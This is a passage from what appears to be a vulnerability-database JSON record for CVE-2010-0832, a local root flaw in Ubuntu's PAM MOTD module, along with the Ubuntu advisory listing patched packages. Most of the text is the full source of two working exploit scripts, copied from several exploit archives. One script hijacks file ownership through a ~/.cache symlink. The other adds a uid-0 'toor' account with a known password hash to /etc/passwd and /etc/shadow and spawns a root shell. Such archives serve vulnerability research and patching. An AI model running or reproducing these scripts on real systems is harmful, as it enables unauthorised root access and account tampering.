\"$S\" >> /etc/shadow \nrestore ~/.cache || { echo \"[-] Failed to restore ~/.cache\"; bye; } \nkey_remove \necho \"[+] Success! Use password toor to get root\" \nsu -c \"sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \\ \nchgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash\" toor \n \n \n`\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/91677/ubuntupammotd-localroot.txt"}, {"lastseen": "2016-12-05T22:23:27", "description": "", "published": "2010-07-08T00:00:00", "type": "packetstorm", "title": "Ubuntu PAM MOTD File Tampering Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0832"], "modified": "2010-07-08T00:00:00", "id": "PACKETSTORM:91613", "href": "https://packetstormsecurity.com/files/91613/Ubuntu-PAM-MOTD-File-Tampering-Privilege-Escalation.html", "sourceData": "`#!/bin/sh \n# \n# Exploit Title: Ubuntu PAM MOTD file tampering (privilege escalation) \n# Date: July 7, 2010 \n# Author: Kristian Erik Hermansen <kristian.hermansen@gmail.com> \n# Software Link: http://packages.ubuntu.com/ \n# Version: pam-1.1.0 \n# Tested on: Ubuntu 10.04 LTS (Lucid Lynx) \n# CVE : CVE-2010-0832 \n# \n# Notes: Affects Ubuntu 9.10 and 10.04 LTS \n# [Patch Instructions] \n# $ sudo aptitude -y update; sudo aptitude -y install libpam~n~i \n# \n \nif [ $# -eq 0 ]; then \necho \"Usage: $0 /path/to/file\" \nexit 1 \nfi \n \nmkdir $HOME/backup 2> /dev/null \ntmpdir=$(mktemp -d --tmpdir=$HOME/backup/) \nmv $HOME/.cache/ $tmpdir 2> /dev/null \necho \"\\n@@@ File before tampering ...\\n\" \nls -l $1 \nln -sf $1 $HOME/.cache \necho \"\\n@@@ Now log back into your shell (or re-ssh) to make PAM call vulnerable MOTD code :) File will then be owned by your user. Try /etc/passwd...\\n\" \n \n`\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/91613/pammotd-escalate.txt"}], "exploitdb": [{"lastseen": "2016-02-01T19:38:02", "description": "Ubuntu 9.10 (Karmic Koala) & 10.04 LTS (Lucid Lynx) PAM 1.1.0 MOTD - Local Root Exploit. CVE-2010-0832. Local exploit for linux platform", "published": "2010-07-12T00:00:00", "type": "exploitdb", "title": "Ubuntu 9.10 Karmic Koala & 10.04 LTS Lucid Lynx PAM 1.1.0 MOTD - Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0832"], "modified": "2010-07-12T00:00:00", "id": "EDB-ID:14339", "href": "https://www.exploit-db.com/exploits/14339/", "sourceData": "#!/bin/bash\r\n#\r\n# Exploit Title: Ubuntu PAM MOTD local root\r\n# Date: July 9, 2010\r\n# Author: Anonymous\r\n# Software Link: http://packages.ubuntu.com/\r\n# Version: pam-1.1.0\r\n# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)\r\n# CVE: CVE-2010-0832\r\n# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i\r\n# References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen\r\n#\r\n# Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow.\r\n# Does not prompt for login by creating temporary SSH key and authorized_keys entry.\r\n#\r\n# user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh\r\n# [*] Ubuntu PAM MOTD local root\r\n# [*] Backuped /home/user/.ssh/authorized_keys\r\n# [*] SSH key set up\r\n# [*] Backuped /home/user/.cache\r\n# [*] spawn ssh\r\n# [+] owned: /etc/passwd\r\n# [*] spawn ssh\r\n# [+] owned: /etc/shadow\r\n# [*] Restored /home/user/.cache\r\n# [*] Restored /home/user/.ssh/authorized_keys\r\n# [*] SSH key removed\r\n# [+] Success! Use password toor to get root\r\n# Password:\r\n# root@ubuntu:/home/user# id\r\n# uid=0(root) gid=0(root) groupes=0(root)\r\n#\r\nP='toor:x:0:0:root:/root:/bin/bash'\r\nS='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::'\r\necho \"[*] Ubuntu PAM MOTD local root\"\r\n[ -z \"$(which ssh)\" ] && echo \"[-] ssh is a requirement\" && exit 1\r\n[ -z \"$(which ssh-keygen)\" ] && echo \"[-] ssh-keygen is a requirement\" && exit 1\r\n[ -z \"$(ps -u root |grep sshd)\" ] && echo \"[-] a running sshd is a requirement\" && exit 1\r\nbackup() {\r\n [ -e \"$1\" ] && [ -e \"$1\".bak ] && rm -rf \"$1\".bak\r\n [ -e \"$1\" ] || return 0\r\n mv \"$1\"{,.bak} || return 1\r\n echo \"[*] Backuped $1\"\r\n}\r\nrestore() {\r\n [ -e \"$1\" ] && rm -rf \"$1\"\r\n [ -e \"$1\".bak ] || return 0\r\n mv \"$1\"{.bak,} || return 1\r\n echo \"[*] Restored $1\"\r\n}\r\nkey_create() {\r\n backup ~/.ssh/authorized_keys\r\n ssh-keygen -q -t rsa -N '' -C 'pam' -f \"$KEY\" || return 1\r\n [ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; }\r\n mv \"$KEY.pub\" ~/.ssh/authorized_keys || return 1\r\n echo \"[*] SSH key set up\"\r\n}\r\nkey_remove() {\r\n rm -f \"$KEY\"\r\n restore ~/.ssh/authorized_keys\r\n echo \"[*] SSH key removed\"\r\n}\r\nown() {\r\n [ -e ~/.cache ] && rm -rf ~/.cache\r\n ln -s \"$1\" ~/.cache || return 1\r\n echo \"[*] spawn ssh\"\r\n ssh -o 'NoHostAuthenticationForLocalhost yes' -i \"$KEY\" localhost true\r\n [ -w \"$1\" ] || { echo \"[-] Own $1 failed\"; restore ~/.cache; bye; }\r\n echo \"[+] owned: $1\"\r\n}\r\nbye() {\r\n key_remove\r\n exit 1\r\n}\r\nKEY=\"$(mktemp -u)\"\r\nkey_create || { echo \"[-] Failed to setup SSH key\"; exit 1; }\r\nbackup ~/.cache || { echo \"[-] Failed to backup ~/.cache\"; bye; }\r\nown /etc/passwd && echo \"$P\" >> /etc/passwd\r\nown /etc/shadow && echo \"$S\" >> /etc/shadow\r\nrestore ~/.cache || { echo \"[-] Failed to restore ~/.cache\"; bye; }\r\nkey_remove\r\necho \"[+] Success! Use password toor to get root\"\r\nsu -c \"sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \\\r\n chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash\" toor\r\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/14339/"}, {"lastseen": "2016-02-01T19:30:42", "description": "Ubuntu PAM MOTD File Tampering (Privilege Escalation). CVE-2010-0832. Local exploit for linux platform", "published": "2010-07-08T00:00:00", "type": "exploitdb", "title": "Ubuntu - PAM MOTD File Tampering Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0832"], "modified": "2010-07-08T00:00:00", "id": "EDB-ID:14273", "href": "https://www.exploit-db.com/exploits/14273/", "sourceData": "#!/bin/sh\r\n#\r\n# Exploit Title: Ubuntu PAM MOTD file tampering (privilege escalation)\r\n# Date: July 7, 2010\r\n# Author: Kristian Erik Hermansen <kristian.hermansen@gmail.com>\r\n# Software Link: http://packages.ubuntu.com/\r\n# Version: pam-1.1.0\r\n# Tested on: Ubuntu 10.04 LTS (Lucid Lynx)\r\n# CVE : CVE-2010-0832\r\n#\r\n# Notes: Affects Ubuntu 9.10 and 10.04 LTS\r\n# [Patch Instructions]\r\n# $ sudo aptitude -y update; sudo aptitude -y install libpam~n~i\r\n#\r\n\r\nif [ $# -eq 0 ]; then\r\n echo \"Usage: $0 /path/to/file\"\r\n exit 1\r\nfi\r\n\r\nmkdir $HOME/backup 2> /dev/null\r\ntmpdir=$(mktemp -d --tmpdir=$HOME/backup/)\r\nmv $HOME/.cache/ $tmpdir 2> /dev/null\r\necho \"\\n@@@ File before tampering ...\\n\"\r\nls -l $1\r\nln -sf $1 $HOME/.cache\r\necho \"\\n@@@ Now log back into your shell (or re-ssh) to make PAM call vulnerable MOTD code :) File will then be owned by your user. Try /etc/passwd...\\n\"\r\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/14273/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-0832"], "description": "No description provided", "edition": 1, "modified": "2010-07-11T00:00:00", "published": "2010-07-11T00:00:00", "id": "SECURITYVULNS:VULN:10985", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10985", "title": "pam motd privilege escalation", "type": "securityvulns", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:35", "bulletinFamily": "software", "cvelist": ["CVE-2010-0832"], "description": "===========================================================\r\nUbuntu Security Notice USN-959-1 July 07, 2010\r\npam vulnerability\r\nCVE-2010-0832\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 9.10\r\nUbuntu 10.04 LTS\r\n\r\nThis advisory also applies to the corresponding versions of\r\nKubuntu, Edubuntu, and Xubuntu.\r\n\r\nThe problem can be corrected by upgrading your system to the\r\nfollowing package versions:\r\n\r\nUbuntu 9.10:\r\n libpam-modules 1.1.0-2ubuntu1.1\r\n\r\nUbuntu 10.04 LTS:\r\n libpam-modules 1.1.1-2ubuntu5\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nDetails follow:\r\n\r\nDenis Excoffier discovered that the PAM MOTD module in Ubuntu did\r\nnot correctly handle path permissions when creating user file stamps.\r\nA local attacker could exploit this to gain root privilieges.\r\n\r\n\r\nUpdated packages for Ubuntu 9.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/pam_1.1.0-2ubuntu1.1.diff.gz\r\n Size/MD5: 260774 2ec56b644febfb1fd3c3a5f2a2361130\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/pam_1.1.0-2ubuntu1.1.dsc\r\n Size/MD5: 1648 dac6d17eabee6953c017c62185414d16\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/pam_1.1.0.orig.tar.gz\r\n Size/MD5: 1739305 004ea633a4bd4d059e68f75b9fab4d35\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam-doc_1.1.0-2ubuntu1.1_all.deb\r\n Size/MD5: 315856 28aedc3f904e50b54c9a2d7d5f691484\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam-runtime_1.1.0-2ubuntu1.1_all.deb\r\n Size/MD5: 114826 b9d20a67aafade65b6af0cac023bdac7\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam-cracklib_1.1.0-2ubuntu1.1_amd64.deb\r\n Size/MD5: 84582 2722dd440bceb99682dc3429d6c66ab9\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam-modules_1.1.0-2ubuntu1.1_amd64.deb\r\n Size/MD5: 381616 bc4b2d752054b26571b1551ee8fc3c24\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam0g-dev_1.1.0-2ubuntu1.1_amd64.deb\r\n Size/MD5: 191018 7be9e071f3636b80ca52373a635e017b\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam0g_1.1.0-2ubuntu1.1_amd64.deb\r\n Size/MD5: 127220 a8e5f4206fa6f65d77e55fdbea03e5df\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam-cracklib_1.1.0-2ubuntu1.1_i386.deb\r\n Size/MD5: 84230 fab89a299667ee0f37191662d1ec91b7\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam-modules_1.1.0-2ubuntu1.1_i386.deb\r\n Size/MD5: 359888 243b7cd25c68b7bf7f497279af2260f0\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam0g-dev_1.1.0-2ubuntu1.1_i386.deb\r\n Size/MD5: 188554 c5d5ae6cc4f1a773cc957e87b72cf417\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam0g_1.1.0-2ubuntu1.1_i386.deb\r\n Size/MD5: 124250 d896c2a0b882135b34bae661a25c829f\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/p/pam/libpam-cracklib_1.1.0-2ubuntu1.1_lpia.deb\r\n Size/MD5: 84148 229e72e88d8c525ebac2d4d2086d8f8f\r\n http://ports.ubuntu.com/pool/main/p/pam/libpam-modules_1.1.0-2ubuntu1.1_lpia.deb\r\n Size/MD5: 358290 bf7479c4b8e9dded50c713f8c179cda9\r\n http://ports.ubuntu.com/pool/main/p/pam/libpam0g-dev_1.1.0-2ubuntu1.1_lpia.deb\r\n Size/MD5: 187374 77a5308ea618047fba8e371e33db7852\r\n http://ports.ubuntu.com/pool/main/p/pam/libpam0g_1.1.0-2ubuntu1.1_lpia.deb\r\n Size/MD5: 123886 3edf4fe8d51c3def26eae4d5b54a3c47\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/p/pam/libpam-cracklib_1.1.0-2ubuntu1.1_powerpc.deb\r\n Size/MD5: 84792 8012d58474360ba290b418796f53b3dd\r\n http://ports.ubuntu.com/pool/main/p/pam/libpam-modules_1.1.0-2ubuntu1.1_powerpc.deb\r\n Size/MD5: 380980 e7b4f667271876091017a8e5c8fb6570\r\n http://ports.ubuntu.com/pool/main/p/pam/libpam0g-dev_1.1.0-2ubuntu1.1_powerpc.deb\r\n Size/MD5: 188930 ea33722bea5e4304e968093b70396df9\r\n http://ports.ubuntu.com/pool/main/p/pam/libpam0g_1.1.0-2ubuntu1.1_powerpc.deb\r\n Size/MD5: 127514 eb35897557798d4dc9a3394989441400\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/p/pam/libpam-cracklib_1.1.0-2ubuntu1.1_sparc.deb\r\n Size/MD5: 84546 4579c413e373c930c15b1feea43f27c0\r\n http://ports.ubuntu.com/pool/main/p/pam/libpam-modules_1.1.0-2ubuntu1.1_sparc.deb\r\n Size/MD5: 366918 ef7abe3044905be705692b7a09243dcd\r\n http://ports.ubuntu.com/pool/main/p/pam/libpam0g-dev_1.1.0-2ubuntu1.1_sparc.deb\r\n Size/MD5: 187018 e324318f10dd0c96fdc97cca1cbdeb07\r\n http://ports.ubuntu.com/pool/main/p/pam/libpam0g_1.1.0-2ubuntu1.1_sparc.deb\r\n Size/MD5: 122882 b15ad14b406b6621e164a0bb237fa3ef\r\n\r\nUpdated packages for Ubuntu 10.04:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/pam_1.1.1-2ubuntu5.diff.gz\r\n Size/MD5: 238745 f085e37315451c2778ceeacad60966bf\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/pam_1.1.1-2ubuntu5.dsc\r\n Size/MD5: 1636 1dfddb112a8f417c2b0fa62fa0d52744\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/pam_1.1.1.orig.tar.gz\r\n Size/MD5: 1799415 b4838d787dd9b046a4d6992e18b6ffac\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam-doc_1.1.1-2ubuntu5_all.deb\r\n Size/MD5: 314838 1cd62135ea43c9dedbb16f3c1da2c49d\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam-runtime_1.1.1-2ubuntu5_all.deb\r\n Size/MD5: 114802 e7abc7b52d847295555242288273f767\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam-cracklib_1.1.1-2ubuntu5_amd64.deb\r\n Size/MD5: 87274 c29e21faec36bcaebe35a48e080d79f5\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam-modules_1.1.1-2ubuntu5_amd64.deb\r\n Size/MD5: 379988 198a067f524a4bb16ca9439f86391d71\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam0g-dev_1.1.1-2ubuntu5_amd64.deb\r\n Size/MD5: 188710 ba81edf6c2392b055f4733f726bbaa7f\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam0g_1.1.1-2ubuntu5_amd64.deb\r\n Size/MD5: 126120 41fd43e5ee4d80e61fcb6559e3199a00\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam-cracklib_1.1.1-2ubuntu5_i386.deb\r\n Size/MD5: 86994 49edae786255f9b096fe4145a7d23ff7\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam-modules_1.1.1-2ubuntu5_i386.deb\r\n Size/MD5: 358148 5e2b29f58356c82f5090554f5df912ae\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam0g-dev_1.1.1-2ubuntu5_i386.deb\r\n Size/MD5: 183276 64fa5b3e4ca8f5d30c92cd6425eb3cb0\r\n http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam0g_1.1.1-2ubuntu5_i386.deb\r\n Size/MD5: 122720 70647b5716631abde54544e61efb9aea\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/p/pam/libpam-cracklib_1.1.1-2ubuntu5_powerpc.deb\r\n Size/MD5: 87594 87844d3898231769e9db4aee0d454d71\r\n http://ports.ubuntu.com/pool/main/p/pam/libpam-modules_1.1.1-2ubuntu5_powerpc.deb\r\n Size/MD5: 379036 b5370dea49eba34b4fc564be97b305c4\r\n http://ports.ubuntu.com/pool/main/p/pam/libpam0g-dev_1.1.1-2ubuntu5_powerpc.deb\r\n Size/MD5: 188712 00d91db20163f7a768aaeff1cbcbe539\r\n http://ports.ubuntu.com/pool/main/p/pam/libpam0g_1.1.1-2ubuntu5_powerpc.deb\r\n Size/MD5: 126382 f0ec306eaa945316851d59d8b579c28f\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/p/pam/libpam-cracklib_1.1.1-2ubuntu5_sparc.deb\r\n Size/MD5: 87312 bf47bb8c5a9ce02f8d606b7021def8f7\r\n http://ports.ubuntu.com/pool/main/p/pam/libpam-modules_1.1.1-2ubuntu5_sparc.deb\r\n Size/MD5: 372130 d78496ad4c242c89d8c7d0b62cd540c5\r\n http://ports.ubuntu.com/pool/main/p/pam/libpam0g-dev_1.1.1-2ubuntu5_sparc.deb\r\n Size/MD5: 184682 dc7bd434195b4707e75ef9716d751f0f\r\n http://ports.ubuntu.com/pool/main/p/pam/libpam0g_1.1.1-2ubuntu5_sparc.deb\r\n Size/MD5: 122362 e2b1204eca46b0b6eab017c46a718c9a\r\n", "edition": 1, "modified": "2010-07-11T00:00:00", "published": "2010-07-11T00:00:00", "id": "SECURITYVULNS:DOC:24206", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24206", "title": "[USN-959-1] PAM vulnerability", "type": "securityvulns", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:29", "description": "\nLinux PAM 1.1.0 (Ubuntu 9.1010.04) - MOTD File Tampering Privilege Escalation (2)", "edition": 1, "published": "2010-07-12T00:00:00", "title": "Linux PAM 1.1.0 (Ubuntu 9.1010.04) - MOTD File Tampering Privilege Escalation (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0832"], "modified": "2010-07-12T00:00:00", "id": "EXPLOITPACK:EF118B023807B3445EEE49C64BEE0398", "href": "", "sourceData": "#!/bin/bash\n#\n# Exploit Title: Ubuntu PAM MOTD local root\n# Date: July 9, 2010\n# Author: Anonymous\n# Software Link: http://packages.ubuntu.com/\n# Version: pam-1.1.0\n# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)\n# CVE: CVE-2010-0832\n# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i\n# References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen\n#\n# Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow.\n# Does not prompt for login by creating temporary SSH key and authorized_keys entry.\n#\n# user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh\n# [*] Ubuntu PAM MOTD local root\n# [*] Backuped /home/user/.ssh/authorized_keys\n# [*] SSH key set up\n# [*] Backuped /home/user/.cache\n# [*] spawn ssh\n# [+] owned: /etc/passwd\n# [*] spawn ssh\n# [+] owned: /etc/shadow\n# [*] Restored /home/user/.cache\n# [*] Restored /home/user/.ssh/authorized_keys\n# [*] SSH key removed\n# [+] Success! Use password toor to get root\n# Password:\n# root@ubuntu:/home/user# id\n# uid=0(root) gid=0(root) groupes=0(root)\n#\nP='toor:x:0:0:root:/root:/bin/bash'\nS='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::'\necho \"[*] Ubuntu PAM MOTD local root\"\n[ -z \"$(which ssh)\" ] && echo \"[-] ssh is a requirement\" && exit 1\n[ -z \"$(which ssh-keygen)\" ] && echo \"[-] ssh-keygen is a requirement\" && exit 1\n[ -z \"$(ps -u root |grep sshd)\" ] && echo \"[-] a running sshd is a requirement\" && exit 1\nbackup() {\n [ -e \"$1\" ] && [ -e \"$1\".bak ] && rm -rf \"$1\".bak\n [ -e \"$1\" ] || return 0\n mv \"$1\"{,.bak} || return 1\n echo \"[*] Backuped $1\"\n}\nrestore() {\n [ -e \"$1\" ] && rm -rf \"$1\"\n [ -e \"$1\".bak ] || return 0\n mv \"$1\"{.bak,} || return 1\n echo \"[*] Restored $1\"\n}\nkey_create() {\n backup ~/.ssh/authorized_keys\n ssh-keygen -q -t rsa -N '' -C 'pam' -f \"$KEY\" || return 1\n [ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; }\n mv \"$KEY.pub\" ~/.ssh/authorized_keys || return 1\n echo \"[*] SSH key set up\"\n}\nkey_remove() {\n rm -f \"$KEY\"\n restore ~/.ssh/authorized_keys\n echo \"[*] SSH key removed\"\n}\nown() {\n [ -e ~/.cache ] && rm -rf ~/.cache\n ln -s \"$1\" ~/.cache || return 1\n echo \"[*] spawn ssh\"\n ssh -o 'NoHostAuthenticationForLocalhost yes' -i \"$KEY\" localhost true\n [ -w \"$1\" ] || { echo \"[-] Own $1 failed\"; restore ~/.cache; bye; }\n echo \"[+] owned: $1\"\n}\nbye() {\n key_remove\n exit 1\n}\nKEY=\"$(mktemp -u)\"\nkey_create || { echo \"[-] Failed to setup SSH key\"; exit 1; }\nbackup ~/.cache || { echo \"[-] Failed to backup ~/.cache\"; bye; }\nown /etc/passwd && echo \"$P\" >> /etc/passwd\nown /etc/shadow && echo \"$S\" >> /etc/shadow\nrestore ~/.cache || { echo \"[-] Failed to restore ~/.cache\"; bye; }\nkey_remove\necho \"[+] Success! Use password toor to get root\"\nsu -c \"sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \\\n chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash\" toor", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:29", "description": "\nLinux PAM 1.1.0 (Ubuntu 9.1010.04) - MOTD File Tampering Privilege Escalation (1)", "edition": 1, "published": "2010-07-08T00:00:00", "title": "Linux PAM 1.1.0 (Ubuntu 9.1010.04) - MOTD File Tampering Privilege Escalation (1)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0832"], "modified": "2010-07-08T00:00:00", "id": "EXPLOITPACK:EE62C9975B1E24AB8BAD58349C1A39C5", "href": "", "sourceData": "#!/bin/sh\n#\n# EDB Note: Updated exploit ~ https://www.exploit-db.com/exploits/14339/\n#\n# Exploit Title: Ubuntu PAM MOTD file tampering (privilege escalation)\n# Date: July 7, 2010\n# Author: Kristian Erik Hermansen <kristian.hermansen@gmail.com>\n# Software Link: http://packages.ubuntu.com/\n# Version: pam-1.1.0\n# Tested on: Ubuntu 10.04 LTS (Lucid Lynx)\n# CVE : CVE-2010-0832\n#\n# Notes: Affects Ubuntu 9.10 and 10.04 LTS\n# [Patch Instructions]\n# $ sudo aptitude -y update; sudo aptitude -y install libpam~n~i\n#\n\nif [ $# -eq 0 ]; then\n echo \"Usage: $0 /path/to/file\"\n exit 1\nfi\n\nmkdir $HOME/backup 2> /dev/null\ntmpdir=$(mktemp -d --tmpdir=$HOME/backup/)\nmv $HOME/.cache/ $tmpdir 2> /dev/null\necho \"\\n@@@ File before tampering ...\\n\"\nls -l $1\nln -sf $1 $HOME/.cache\necho \"\\n@@@ Now log back into your shell (or re-ssh) to make PAM call vulnerable MOTD code :) File will then be owned by your user. Try /etc/passwd...\\n\"", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T18:09:50", "description": "No description provided by source.", "published": "2010-07-10T00:00:00", "type": "seebug", "title": "Ubuntu PAM MOTD File Tampering (Privilege Escalation)", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0832"], "modified": "2010-07-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19936", "id": "SSV:19936", "sourceData": "\n #!/bin/sh\r\n#\r\n# Exploit Title: Ubuntu PAM MOTD file tampering (privilege escalation)\r\n# Date: July 7, 2010\r\n# Author: Kristian Erik Hermansen <kristian.hermansen@gmail.com>\r\n# Software Link: http://packages.ubuntu.com/\r\n# Version: pam-1.1.0\r\n# Tested on: Ubuntu 10.04 LTS (Lucid Lynx)\r\n# CVE : CVE-2010-0832\r\n#\r\n# Notes: Affects Ubuntu 9.10 and 10.04 LTS\r\n# [Patch Instructions]\r\n# $ sudo aptitude -y update; sudo aptitude -y install libpam~n~i\r\n#\r\n \r\nif [ $# -eq 0 ]; then\r\n echo "Usage: $0 /path/to/file"\r\n exit 1\r\nfi\r\n \r\nmkdir $HOME/backup 2> /dev/null\r\ntmpdir=$(mktemp -d --tmpdir=$HOME/backup/)\r\nmv $HOME/.cache/ $tmpdir 2> /dev/null\r\necho "\\n@@@ File before tampering ...\\n"\r\nls -l $1\r\nln -sf $1 $HOME/.cache\r\necho "\\n@@@ Now log back into your shell (or re-ssh) to make PAM call vulnerable MOTD code :) File will then be owned by your user. Try /etc/passwd...\\n"\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-19936", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T13:21:29", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "type": "seebug", "title": "Ubuntu PAM 1.1.0 MOTD - Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0832"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-69376", "id": "SSV:69376", "sourceData": "\n #!/bin/bash\r\n#\r\n# Exploit Title: Ubuntu PAM MOTD local root\r\n# Date: July 9, 2010\r\n# Author: Anonymous\r\n# Software Link: http://packages.ubuntu.com/\r\n# Version: pam-1.1.0\r\n# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)\r\n# CVE: CVE-2010-0832\r\n# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i\r\n# References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen\r\n#\r\n# Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow.\r\n# Does not prompt for login by creating temporary SSH key and authorized_keys entry.\r\n#\r\n# user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh\r\n# [*] Ubuntu PAM MOTD local root\r\n# [*] Backuped /home/user/.ssh/authorized_keys\r\n# [*] SSH key set up\r\n# [*] Backuped /home/user/.cache\r\n# [*] spawn ssh\r\n# [+] owned: /etc/passwd\r\n# [*] spawn ssh\r\n# [+] owned: /etc/shadow\r\n# [*] Restored /home/user/.cache\r\n# [*] Restored /home/user/.ssh/authorized_keys\r\n# [*] SSH key removed\r\n# [+] Success! Use password toor to get root\r\n# Password:\r\n# root@ubuntu:/home/user# id\r\n# uid=0(root) gid=0(root) 